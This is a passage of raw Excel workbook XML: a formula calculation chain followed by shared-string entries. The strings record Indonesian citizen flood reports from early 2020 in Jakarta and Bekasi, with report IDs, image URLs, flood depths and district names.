  <c r="Y3629" i="1"/>
  <c r="Y3630" i="1"/>
  <c r="Y3631" i="1"/>
  <c r="Y3632" i="1"/>
  <c r="Y3633" i="1"/>
  <c r="Y3634" i="1"/>
  <c r="Y3635" i="1"/>
  <c r="Y3636" i="1"/>
  <c r="Y3637" i="1"/>
  <c r="Y3638" i="1"/>
  <c r="Y3639" i="1"/>
  <c r="Y3640" i="1"/>
  <c r="Y3641" i="1"/>
  <c r="Y3642" i="1"/>
  <c r="Y3643" i="1"/>
  <c r="Y3644" i="1"/>
  <c r="Y3645" i="1"/>
  <c r="Y3646" i="1"/>
  <c r="Y3647" i="1"/>
  <c r="Y3648" i="1"/>
  <c r="Y3649" i="1"/>
  <c r="Y3650" i="1"/>
  <c r="Y3651" i="1"/>
  <c r="Y3652" i="1"/>
  <c r="Y3653" i="1"/>
  <c r="Y3654" i="1"/>
  <c r="Y3655" i="1"/>
  <c r="Y3656" i="1"/>
  <c r="Y3657" i="1"/>
  <c r="Y3658" i="1"/>
  <c r="Y3659" i="1"/>
  <c r="Y3660" i="1"/>
  <c r="Y3661" i="1"/>
  <c r="Y3662" i="1"/>
  <c r="Y3663" i="1"/>
  <c r="Y3664" i="1"/>
  <c r="Y3665" i="1"/>
  <c r="Y3666" i="1"/>
  <c r="Y3667" i="1"/>
  <c r="Y3668" i="1"/>
  <c r="Y3669" i="1"/>
  <c r="Y3670" i="1"/>
  <c r="Y3671" i="1"/>
  <c r="Y3672" i="1"/>
  <c r="Y3673" i="1"/>
  <c r="Y3674" i="1"/>
  <c r="Y3675" i="1"/>
  <c r="Y3676" i="1"/>
  <c r="Y3677" i="1"/>
  <c r="Y3678" i="1"/>
  <c r="Y3679" i="1"/>
  <c r="Y3680" i="1"/>
  <c r="Y3681" i="1"/>
  <c r="Y3682" i="1"/>
  <c r="Y3683" i="1"/>
  <c r="Y3684" i="1"/>
  <c r="Y3685" i="1"/>
  <c r="Y3686" i="1"/>
  <c r="Y3687" i="1"/>
  <c r="Y3688" i="1"/>
  <c r="Y3689" i="1"/>
  <c r="Y3690" i="1"/>
  <c r="Y3691" i="1"/>
  <c r="Y3692" i="1"/>
  <c r="Y3693" i="1"/>
  <c r="Y3694" i="1"/>
  <c r="Y3695" i="1"/>
  <c r="Y3696" i="1"/>
  <c r="Y3697" i="1"/>
  <c r="Y3698" i="1"/>
  <c r="Y3699" i="1"/>
  <c r="Y3700" i="1"/>
  <c r="Y3701" i="1"/>
  <c r="Y3702" i="1"/>
  <c r="Y3703" i="1"/>
  <c r="Y3704" i="1"/>
  <c r="Y3705" i="1"/>
  <c r="Y3706" i="1"/>
  <c r="Y3707" i="1"/>
  <c r="Y3708" i="1"/>
  <c r="Y3709" i="1"/>
  <c r="Y3710" i="1"/>
  <c r="Y3711" i="1"/>
  <c r="Y3712" i="1"/>
  <c r="Y3713" i="1"/>
  <c r="Y3714" i="1"/>
  <c r="Y3715" i="1"/>
  <c r="Y3716" i="1"/>
  <c r="Y3717" i="1"/>
  <c r="Y3718" i="1"/>
  <c r="Y3719" i="1"/>
  <c r="Y3720" i="1"/>
  <c r="Y3721" i="1"/>
  <c r="Y3722" i="1"/>
  <c r="Y3723" i="1"/>
  <c r="Y3724" i="1"/>
  <c r="Y3725" i="1"/>
  <c r="Y3726" i="1"/>
  <c r="Y3727" i="1"/>
  <c r="Y3728" i="1"/>
  <c r="Y3729" i="1"/>
  <c r="Y3730" i="1"/>
  <c r="Y3731" i="1"/>
  <c r="Y3732" i="1"/>
  <c r="Y3733" i="1"/>
  <c r="Y3734" i="1"/>
  <c r="Y3735" i="1"/>
  <c r="Y3736" i="1"/>
  <c r="Y3737" i="1"/>
  <c r="Y3738" i="1"/>
  <c r="Y3739" i="1"/>
  <c r="Y3740" i="1"/>
  <c r="Y3741" i="1"/>
  <c r="Y3742" i="1"/>
  <c r="Y3743" i="1"/>
  <c r="Y3744" i="1"/>
  <c r="Y3745" i="1"/>
  <c r="Y3746" i="1"/>
  <c r="Y3747" i="1"/>
  <c r="Y3748" i="1"/>
  <c r="Y3749" i="1"/>
  <c r="Y3750" i="1"/>
  <c r="Y3751" i="1"/>
  <c r="Y3752" i="1"/>
  <c r="Y3753" i="1"/>
  <c r="Y3754" i="1"/>
  <c r="Y3755" i="1"/>
  <c r="Y3756" i="1"/>
  <c r="Y3757" i="1"/>
  <c r="Y3758" i="1"/>
  <c r="Y3759" i="1"/>
  <c r="Y3760" i="1"/>
  <c r="Y3761" i="1"/>
  <c r="Y3762" i="1"/>
  <c r="Y3763" i="1"/>
  <c r="Y3764" i="1"/>
  <c r="Y3765" i="1"/>
  <c r="Y3766" i="1"/>
  <c r="Y3767" i="1"/>
  <c r="Y3768" i="1"/>
  <c r="Y3769" i="1"/>
  <c r="Y3770" i="1"/>
  <c r="Y3771" i="1"/>
  <c r="Y3772" i="1"/>
  <c r="Y3773" i="1"/>
  <c r="Y3774" i="1"/>
  <c r="Y3775" i="1"/>
  <c r="Y3776" i="1"/>
  <c r="Y3777" i="1"/>
  <c r="Y3778" i="1"/>
  <c r="Y3779" i="1"/>
  <c r="Y3780" i="1"/>
  <c r="Y3781" i="1"/>
  <c r="Y3782" i="1"/>
  <c r="Y3783" i="1"/>
  <c r="Y3784" i="1"/>
  <c r="Y3785" i="1"/>
  <c r="Y3786" i="1"/>
  <c r="Y3787" i="1"/>
  <c r="Y3788" i="1"/>
  <c r="Y3789" i="1"/>
  <c r="Y3790" i="1"/>
  <c r="Y3791" i="1"/>
  <c r="Y3792" i="1"/>
  <c r="Y3793" i="1"/>
  <c r="Y3794" i="1"/>
  <c r="Y3795" i="1"/>
  <c r="Y3796" i="1"/>
  <c r="Y3797" i="1"/>
  <c r="Y3798" i="1"/>
  <c r="Y3799" i="1"/>
  <c r="Y3800" i="1"/>
  <c r="Y3801" i="1"/>
  <c r="Y3802" i="1"/>
  <c r="Y3803" i="1"/>
  <c r="Y3804" i="1"/>
  <c r="Y3805" i="1"/>
  <c r="Y3806" i="1"/>
  <c r="Y3807" i="1"/>
  <c r="Y3808" i="1"/>
  <c r="Y3809" i="1"/>
  <c r="Y3810" i="1"/>
  <c r="Y3811" i="1"/>
  <c r="Y3812" i="1"/>
  <c r="Y3813" i="1"/>
  <c r="Y3814" i="1"/>
  <c r="Y3815" i="1"/>
  <c r="Y3816" i="1"/>
  <c r="Y3817" i="1"/>
  <c r="Y3818" i="1"/>
  <c r="Y3819" i="1"/>
  <c r="Y3820" i="1"/>
  <c r="Y3821" i="1"/>
  <c r="Y3822" i="1"/>
  <c r="Y3823" i="1"/>
  <c r="Y3824" i="1"/>
  <c r="Y3825" i="1"/>
  <c r="Y3826" i="1"/>
  <c r="Y3827" i="1"/>
  <c r="Y3828" i="1"/>
  <c r="Y3829" i="1"/>
  <c r="Y3830" i="1"/>
  <c r="Y3831" i="1"/>
  <c r="Y3832" i="1"/>
  <c r="Y3833" i="1"/>
  <c r="Y3834" i="1"/>
  <c r="Y3835" i="1"/>
  <c r="Y3836" i="1"/>
  <c r="Y3837" i="1"/>
  <c r="Y3838" i="1"/>
  <c r="Y3839" i="1"/>
  <c r="Y3840" i="1"/>
  <c r="Y3841" i="1"/>
  <c r="Y3842" i="1"/>
  <c r="Y3843" i="1"/>
  <c r="Y3844" i="1"/>
  <c r="Y3845" i="1"/>
  <c r="Y3846" i="1"/>
  <c r="Y3847" i="1"/>
  <c r="Y3848" i="1"/>
  <c r="Y3849" i="1"/>
  <c r="Y3850" i="1"/>
  <c r="Y3851" i="1"/>
  <c r="Y3852" i="1"/>
  <c r="Y3853" i="1"/>
  <c r="Y3854" i="1"/>
  <c r="Y3855" i="1"/>
  <c r="Y3856" i="1"/>
  <c r="Y3857" i="1"/>
  <c r="Y3858" i="1"/>
  <c r="Y3859" i="1"/>
  <c r="Y3860" i="1"/>
  <c r="Y3861" i="1"/>
  <c r="Y3862" i="1"/>
  <c r="Y3863" i="1"/>
  <c r="Y3864" i="1"/>
  <c r="Y3865" i="1"/>
  <c r="Y3866" i="1"/>
  <c r="Y3867" i="1"/>
  <c r="Y3868" i="1"/>
  <c r="Y3869" i="1"/>
  <c r="Y3870" i="1"/>
  <c r="Y3871" i="1"/>
  <c r="Y3872" i="1"/>
  <c r="Y3873" i="1"/>
  <c r="Y3874" i="1"/>
  <c r="Y3875" i="1"/>
  <c r="Y3876" i="1"/>
  <c r="Y3877" i="1"/>
  <c r="Y3878" i="1"/>
  <c r="Y3879" i="1"/>
  <c r="Y3880" i="1"/>
  <c r="Y3881" i="1"/>
  <c r="Y3882" i="1"/>
  <c r="Y3883" i="1"/>
  <c r="Y3884" i="1"/>
  <c r="Y3885" i="1"/>
  <c r="Y3886" i="1"/>
  <c r="Y3887" i="1"/>
  <c r="Y3888" i="1"/>
  <c r="Y3889" i="1"/>
  <c r="Y3890" i="1"/>
  <c r="Y3891" i="1"/>
  <c r="Y3892" i="1"/>
  <c r="Y3893" i="1"/>
  <c r="Y3894" i="1"/>
  <c r="Y3895" i="1"/>
  <c r="Y3896" i="1"/>
  <c r="Y3897" i="1"/>
  <c r="Y3898" i="1"/>
  <c r="Y3899" i="1"/>
  <c r="Y3900" i="1"/>
  <c r="Y3901" i="1"/>
  <c r="Y3902" i="1"/>
  <c r="Y3903" i="1"/>
  <c r="Y3904" i="1"/>
  <c r="Y3905" i="1"/>
  <c r="Y3906" i="1"/>
  <c r="Y3907" i="1"/>
  <c r="Y3908" i="1"/>
  <c r="Y3909" i="1"/>
  <c r="Y3910" i="1"/>
  <c r="Y3911" i="1"/>
  <c r="Y3912" i="1"/>
  <c r="Y3913" i="1"/>
  <c r="Y3914" i="1"/>
  <c r="Y3915" i="1"/>
  <c r="Y3916" i="1"/>
  <c r="Y3917" i="1"/>
  <c r="Y3918" i="1"/>
  <c r="Y3919" i="1"/>
  <c r="Y3920" i="1"/>
  <c r="Y3921" i="1"/>
  <c r="Y3922" i="1"/>
  <c r="Y3923" i="1"/>
  <c r="Y3924" i="1"/>
  <c r="Y3925" i="1"/>
  <c r="Y3926" i="1"/>
  <c r="Y3927" i="1"/>
  <c r="Y3928" i="1"/>
  <c r="Y3929" i="1"/>
  <c r="Y3930" i="1"/>
  <c r="Y3931" i="1"/>
  <c r="Y3932" i="1"/>
  <c r="Y3933" i="1"/>
  <c r="Y3934" i="1"/>
  <c r="Y3935" i="1"/>
  <c r="Y3936" i="1"/>
  <c r="Y3937" i="1"/>
  <c r="Y3938" i="1"/>
  <c r="Y3939" i="1"/>
  <c r="Y3940" i="1"/>
  <c r="Y3941" i="1"/>
  <c r="Y3942" i="1"/>
  <c r="Y3943" i="1"/>
  <c r="Y3944" i="1"/>
  <c r="Y3945" i="1"/>
  <c r="Y3946" i="1"/>
  <c r="Y3947" i="1"/>
  <c r="Y3948" i="1"/>
  <c r="Y3949" i="1"/>
  <c r="Y3950" i="1"/>
  <c r="Y3951" i="1"/>
  <c r="Y3952" i="1"/>
  <c r="Y3953" i="1"/>
  <c r="Y3954" i="1"/>
  <c r="Y3955" i="1"/>
  <c r="Y3956" i="1"/>
  <c r="Y3957" i="1"/>
  <c r="Y3958" i="1"/>
  <c r="Y3959" i="1"/>
  <c r="Y3960" i="1"/>
  <c r="Y3961" i="1"/>
  <c r="Y3962" i="1"/>
  <c r="Y3963" i="1"/>
  <c r="Y3964" i="1"/>
  <c r="Y3965" i="1"/>
  <c r="Y3966" i="1"/>
  <c r="Y3967" i="1"/>
  <c r="Y3968" i="1"/>
  <c r="Y3969" i="1"/>
  <c r="Y3970" i="1"/>
  <c r="Y3971" i="1"/>
  <c r="Y3972" i="1"/>
  <c r="Y3973" i="1"/>
  <c r="Y3974" i="1"/>
  <c r="Y3975" i="1"/>
  <c r="Y3976" i="1"/>
  <c r="Y3977" i="1"/>
  <c r="Y3978" i="1"/>
  <c r="Y3979" i="1"/>
  <c r="Y3980" i="1"/>
  <c r="Y3981" i="1"/>
  <c r="Y3982" i="1"/>
  <c r="Y3983" i="1"/>
  <c r="Y3984" i="1"/>
  <c r="Y3985" i="1"/>
  <c r="Y3986" i="1"/>
  <c r="Y3987" i="1"/>
  <c r="Y3988" i="1"/>
  <c r="Y3989" i="1"/>
  <c r="Y3990" i="1"/>
  <c r="Y3991" i="1"/>
  <c r="Y3992" i="1"/>
  <c r="Y3993" i="1"/>
  <c r="Y3994" i="1"/>
  <c r="Y3995" i="1"/>
  <c r="Y3996" i="1"/>
  <c r="Y3997" i="1"/>
  <c r="Y3998" i="1"/>
  <c r="Y3999" i="1"/>
  <c r="Y4000" i="1"/>
  <c r="Y4001" i="1"/>
  <c r="Y4002" i="1"/>
  <c r="Y4003" i="1"/>
  <c r="Y4004" i="1"/>
  <c r="Y4005" i="1"/>
  <c r="Y4006" i="1"/>
  <c r="Y4007" i="1"/>
  <c r="Y4008" i="1"/>
  <c r="Y4009" i="1"/>
  <c r="Y4010" i="1"/>
  <c r="Y4011" i="1"/>
  <c r="Y4012" i="1"/>
  <c r="Y4013" i="1"/>
  <c r="Y4014" i="1"/>
  <c r="Y4015" i="1"/>
  <c r="Y4016" i="1"/>
  <c r="Y4017" i="1"/>
  <c r="Y4018" i="1"/>
  <c r="Y4019" i="1"/>
  <c r="Y4020" i="1"/>
  <c r="Y4021" i="1"/>
  <c r="Y4022" i="1"/>
  <c r="Y4023" i="1"/>
  <c r="Y4024" i="1"/>
  <c r="Y4025" i="1"/>
  <c r="Y4026" i="1"/>
  <c r="Y4027" i="1"/>
  <c r="Y4028" i="1"/>
  <c r="Y4029" i="1"/>
  <c r="Y4030" i="1"/>
  <c r="Y4031" i="1"/>
  <c r="Y4032" i="1"/>
  <c r="Y4033" i="1"/>
  <c r="Y4034" i="1"/>
  <c r="Y4035" i="1"/>
  <c r="Y4036" i="1"/>
  <c r="Y4037" i="1"/>
  <c r="Y4038" i="1"/>
  <c r="Y4039" i="1"/>
  <c r="Y4040" i="1"/>
  <c r="Y4041" i="1"/>
  <c r="Y4042" i="1"/>
  <c r="Y4043" i="1"/>
  <c r="Y4044" i="1"/>
  <c r="Y4045" i="1"/>
  <c r="Y4046" i="1"/>
  <c r="Y4047" i="1"/>
  <c r="Y4048" i="1"/>
  <c r="Y4049" i="1"/>
  <c r="Y4050" i="1"/>
  <c r="Y4051" i="1"/>
  <c r="Y4052" i="1"/>
  <c r="Y4053" i="1"/>
  <c r="Y4054" i="1"/>
  <c r="Y4055" i="1"/>
  <c r="Y4056" i="1"/>
  <c r="Y4057" i="1"/>
  <c r="Y4058" i="1"/>
  <c r="Y4059" i="1"/>
  <c r="Y4060" i="1"/>
  <c r="Y4061" i="1"/>
  <c r="Y4062" i="1"/>
  <c r="Y4063" i="1"/>
  <c r="Y4064" i="1"/>
  <c r="Y4065" i="1"/>
  <c r="Y4066" i="1"/>
  <c r="Y4067" i="1"/>
  <c r="Y4068" i="1"/>
  <c r="Y4069" i="1"/>
  <c r="Y4070" i="1"/>
  <c r="Y4071" i="1"/>
  <c r="Y4072" i="1"/>
  <c r="Y4073" i="1"/>
  <c r="Y4074" i="1"/>
  <c r="Y4075" i="1"/>
  <c r="Y4076" i="1"/>
  <c r="Y4077" i="1"/>
  <c r="Y4078" i="1"/>
  <c r="Y4079" i="1"/>
  <c r="Y4080" i="1"/>
  <c r="Y4081" i="1"/>
  <c r="Y4082" i="1"/>
  <c r="Y4083" i="1"/>
  <c r="Y4084" i="1"/>
  <c r="Y4085" i="1"/>
  <c r="Y4086" i="1"/>
  <c r="Y4087" i="1"/>
  <c r="Y4088" i="1"/>
  <c r="Y4089" i="1"/>
  <c r="Y4090" i="1"/>
  <c r="Y4091" i="1"/>
  <c r="Y4092" i="1"/>
  <c r="Y4093" i="1"/>
  <c r="Y4094" i="1"/>
  <c r="Y4095" i="1"/>
  <c r="Y4096" i="1"/>
  <c r="Y4097" i="1"/>
  <c r="Y4098" i="1"/>
  <c r="Y4099" i="1"/>
  <c r="Y4100" i="1"/>
  <c r="Y4101" i="1"/>
  <c r="Y4102" i="1"/>
  <c r="Y4103" i="1"/>
  <c r="Y4104" i="1"/>
  <c r="Y4105" i="1"/>
  <c r="Y4106" i="1"/>
  <c r="Y4107" i="1"/>
  <c r="Y4108" i="1"/>
  <c r="Y4109" i="1"/>
  <c r="Y4110" i="1"/>
  <c r="Y4111" i="1"/>
  <c r="Y4112" i="1"/>
  <c r="Y4113" i="1"/>
  <c r="Y4114" i="1"/>
  <c r="Y4115" i="1"/>
  <c r="Y4116" i="1"/>
  <c r="Y4117" i="1"/>
  <c r="Y4118" i="1"/>
  <c r="Y4119" i="1"/>
  <c r="Y4120" i="1"/>
  <c r="Y4121" i="1"/>
  <c r="Y4122" i="1"/>
  <c r="Y4123" i="1"/>
  <c r="Y4124" i="1"/>
  <c r="Y4125" i="1"/>
  <c r="Y4126" i="1"/>
  <c r="Y4127" i="1"/>
  <c r="Y4128" i="1"/>
  <c r="Y4129" i="1"/>
  <c r="Y4130" i="1"/>
  <c r="Y4131" i="1"/>
  <c r="Y4132" i="1"/>
  <c r="Y4133" i="1"/>
  <c r="Y4134" i="1"/>
  <c r="Y4135" i="1"/>
  <c r="Y4136" i="1"/>
  <c r="Y4137" i="1"/>
  <c r="Y4138" i="1"/>
  <c r="Y4139" i="1"/>
  <c r="Y4140" i="1"/>
  <c r="Y4141" i="1"/>
  <c r="Y4142" i="1"/>
  <c r="Y4143" i="1"/>
  <c r="Y4144" i="1"/>
  <c r="Y4145" i="1"/>
  <c r="Y4146" i="1"/>
  <c r="Y4147" i="1"/>
  <c r="Y4148" i="1"/>
  <c r="Y4149" i="1"/>
  <c r="Y4150" i="1"/>
  <c r="Y4151" i="1"/>
  <c r="Y4152" i="1"/>
  <c r="Y4153" i="1"/>
  <c r="Y4154" i="1"/>
  <c r="Y4155" i="1"/>
  <c r="Y4156" i="1"/>
  <c r="Y4157" i="1"/>
  <c r="Y4158" i="1"/>
  <c r="Y4159" i="1"/>
  <c r="Y4160" i="1"/>
  <c r="Y4161" i="1"/>
  <c r="Y4162" i="1"/>
  <c r="Y4163" i="1"/>
  <c r="Y4164" i="1"/>
  <c r="Y4165" i="1"/>
  <c r="Y4166" i="1"/>
  <c r="Y4167" i="1"/>
  <c r="Y4168" i="1"/>
  <c r="Y4169" i="1"/>
  <c r="Y4170" i="1"/>
  <c r="Y4171" i="1"/>
  <c r="Y4172" i="1"/>
  <c r="Y4173" i="1"/>
  <c r="Y4174" i="1"/>
  <c r="Y4175" i="1"/>
  <c r="Y4176" i="1"/>
  <c r="Y4177" i="1"/>
  <c r="Y4178" i="1"/>
  <c r="Y4179" i="1"/>
  <c r="Y4180" i="1"/>
  <c r="Y4181" i="1"/>
  <c r="Y4182" i="1"/>
  <c r="Y4183" i="1"/>
  <c r="Y4184" i="1"/>
  <c r="Y4185" i="1"/>
  <c r="Y4186" i="1"/>
  <c r="Y4187" i="1"/>
  <c r="Y4188" i="1"/>
  <c r="Y4189" i="1"/>
  <c r="Y4190" i="1"/>
  <c r="Y4191" i="1"/>
  <c r="Y4192" i="1"/>
  <c r="Y4193" i="1"/>
  <c r="Y4194" i="1"/>
  <c r="Y4195" i="1"/>
  <c r="Y4196" i="1"/>
  <c r="Y4197" i="1"/>
  <c r="Y4198" i="1"/>
  <c r="Y4199" i="1"/>
  <c r="Y4200" i="1"/>
  <c r="Y4201" i="1"/>
  <c r="Y4202" i="1"/>
  <c r="Y4203" i="1"/>
  <c r="Y4204" i="1"/>
  <c r="Y2" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="56705" uniqueCount="22000">
  <si>
    <t>pkey</t>
  </si>
  <si>
    <t>date</t>
  </si>
  <si>
    <t>time</t>
  </si>
  <si>
    <t>source</t>
  </si>
  <si>
    <t>status</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>image_url</t>
  </si>
  <si>
    <t>disaster_type</t>
  </si>
  <si>
    <t>report_dat</t>
  </si>
  <si>
    <t>tags</t>
  </si>
  <si>
    <t>title</t>
  </si>
  <si>
    <t>text</t>
  </si>
  <si>
    <t>ID_Desa</t>
  </si>
  <si>
    <t>ID_Kec</t>
  </si>
  <si>
    <t>ID_Kab</t>
  </si>
  <si>
    <t>ID_Prov</t>
  </si>
  <si>
    <t>Desa</t>
  </si>
  <si>
    <t>Kecamatan</t>
  </si>
  <si>
    <t>Kabupaten</t>
  </si>
  <si>
    <t>Provinsi</t>
  </si>
  <si>
    <t>long</t>
  </si>
  <si>
    <t>lat</t>
  </si>
  <si>
    <t>grasp</t>
  </si>
  <si>
    <t>confirmed</t>
  </si>
  <si>
    <t>2042596d-b551-4ef2-803d-1ee964cf2278</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2042596d-b551-4ef2-803d-1ee964cf2278.jpg</t>
  </si>
  <si>
    <t>flood</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 30 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "125", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di daerah taman ratu dan sekitarnya. Paling parah dari tahun2 sebelumnya</t>
  </si>
  <si>
    <t>Duri Kepa</t>
  </si>
  <si>
    <t>Kebon Jeruk</t>
  </si>
  <si>
    <t>Jakarta Barat</t>
  </si>
  <si>
    <t>Daerah Khusus Ibukota Jakarta</t>
  </si>
  <si>
    <t>5a0ad45f-7020-43b7-882f-672487ebc6d8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a0ad45f-7020-43b7-882f-672487ebc6d8.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 80, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. Kemuning Indah Bekasi"</t>
  </si>
  <si>
    <t>Pejuang</t>
  </si>
  <si>
    <t>Medan Satria</t>
  </si>
  <si>
    <t>Bekasi</t>
  </si>
  <si>
    <t>Jawa Barat</t>
  </si>
  <si>
    <t>e065b40d-2084-48d6-b42f-1f98cb33e4cc</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 51, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1789", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir selutut orang dewasa di jalan ros merah 2 cipinang indah</t>
  </si>
  <si>
    <t>Cipinang Muara</t>
  </si>
  <si>
    <t>Jatinegara</t>
  </si>
  <si>
    <t>Jakarta Timur</t>
  </si>
  <si>
    <t>7cb26903-b1c8-4be7-8b81-7014c8a83fbd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7cb26903-b1c8-4be7-8b81-7014c8a83fbd.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 100, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di daerah kedasih dan sekitarnya, karena hujan dari semalam belum berhenti, sudah memasuki rumah dari jam 7 pagi tadi</t>
  </si>
  <si>
    <t>Mekarmukti</t>
  </si>
  <si>
    <t>Cikarang Utara</t>
  </si>
  <si>
    <t>570d2cb8-d5b6-404f-86ef-8a2a0d27f391</t>
  </si>
  <si>
    <t>https://images.petabencana.id/570d2cb8-d5b6-404f-86ef-8a2a0d27f391.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 15, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "193", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Cempaka Baru</t>
  </si>
  <si>
    <t>Kemayoran</t>
  </si>
  <si>
    <t>Jakarta Pusat</t>
  </si>
  <si>
    <t>04b4f2a6-929c-47cc-8adb-7a1e16c88951</t>
  </si>
  <si>
    <t>https://images.petabencana.id/04b4f2a6-929c-47cc-8adb-7a1e16c88951.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 60 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "220", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir area komplek Meruya Ilir sejak jam 5 naik terus. Listri hingga kini belum dipadamkan.</t>
  </si>
  <si>
    <t>Meruya Utara</t>
  </si>
  <si>
    <t>Kembangan</t>
  </si>
  <si>
    <t>7d6aef62-364f-407e-af24-5666c8c0ca04</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7d6aef62-364f-407e-af24-5666c8c0ca04.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 39 }</t>
  </si>
  <si>
    <t>Di perumahan boulevard hijau jalan raya setinggi 40-60 cm Perumahan 20-40 cm"</t>
  </si>
  <si>
    <t>2114b7b1-9da6-421c-8d8e-ad4f2404cde3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2114b7b1-9da6-421c-8d8e-ad4f2404cde3.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 36 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "241", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>7662d562-9845-4d41-ab58-b939e4d89bf7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7662d562-9845-4d41-ab58-b939e4d89bf7.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 79 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "938", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tinggi Genangan Air 60 ~ 70 Cm</t>
  </si>
  <si>
    <t>Duri Kosambi</t>
  </si>
  <si>
    <t>Cengkareng</t>
  </si>
  <si>
    <t>detik</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/346984</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/346984-15778442741799653252.mp4-03.jpg</t>
  </si>
  <si>
    <t>Banjir di Taman Yasmin Raya Masjid Jami Ar-Raudhah Bekasi</t>
  </si>
  <si>
    <t>Akibat hujan yang terus menerus Banjir menggenangi Jl Taman Yasmin Raya Masjid Jami Ar-Raudhah THB Bekasi</t>
  </si>
  <si>
    <t>8c80c326-1762-42bb-be45-321a5821c951</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c80c326-1762-42bb-be45-321a5821c951.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 116 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2574", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kondisi saat ini di jalan pesing koneng RW 08 seluruh RT</t>
  </si>
  <si>
    <t>Kedoya Utara</t>
  </si>
  <si>
    <t>12403390-d82a-4b03-84a0-77984f567c3a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/12403390-d82a-4b03-84a0-77984f567c3a.jpg</t>
  </si>
  <si>
    <t>Banjir, om. What should I say more?</t>
  </si>
  <si>
    <t>Duren Jaya</t>
  </si>
  <si>
    <t>Bekasi Timur</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/346985</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/346985-1577844820114490825.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "points": 1 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1354", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kondisi Air di Depan Halte Transjakarta Setia Kuningan</t>
  </si>
  <si>
    <t>Begini kondisi Jl.HR Rasuna Said Depan Halte Transjakarta Setia Budi Selatan,akses jalan tak dapat dilalui oleh kendaraan pkl 09:15</t>
  </si>
  <si>
    <t>Setia Budi</t>
  </si>
  <si>
    <t>Jakarta Selatan</t>
  </si>
  <si>
    <t>5fde8be7-e24f-4114-93bb-b71e58a7b800</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5fde8be7-e24f-4114-93bb-b71e58a7b800.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 81 }</t>
  </si>
  <si>
    <t>Banjir setinggi paha</t>
  </si>
  <si>
    <t>Bintara</t>
  </si>
  <si>
    <t>Bekasi Barat</t>
  </si>
  <si>
    <t>c12c6d8b-abd2-4adc-8786-64dff69a63f8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c12c6d8b-abd2-4adc-8786-64dff69a63f8.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 69 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1134", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Taman Kemang banjir setinggi setengah pintu mobil.</t>
  </si>
  <si>
    <t>Bangka</t>
  </si>
  <si>
    <t>Mampang Prapatan</t>
  </si>
  <si>
    <t>eb8ad65c-2354-4f7e-a690-2f4fe17aca3d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eb8ad65c-2354-4f7e-a690-2f4fe17aca3d.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 195, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1685", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Mall Cipinang Indah banjir menggenangi basement dan Carrefour</t>
  </si>
  <si>
    <t>Pondok Bambu</t>
  </si>
  <si>
    <t>Duren Sawit</t>
  </si>
  <si>
    <t>09300076-a527-45ae-a335-6b5d0ed2e817</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09300076-a527-45ae-a335-6b5d0ed2e817.jpg</t>
  </si>
  <si>
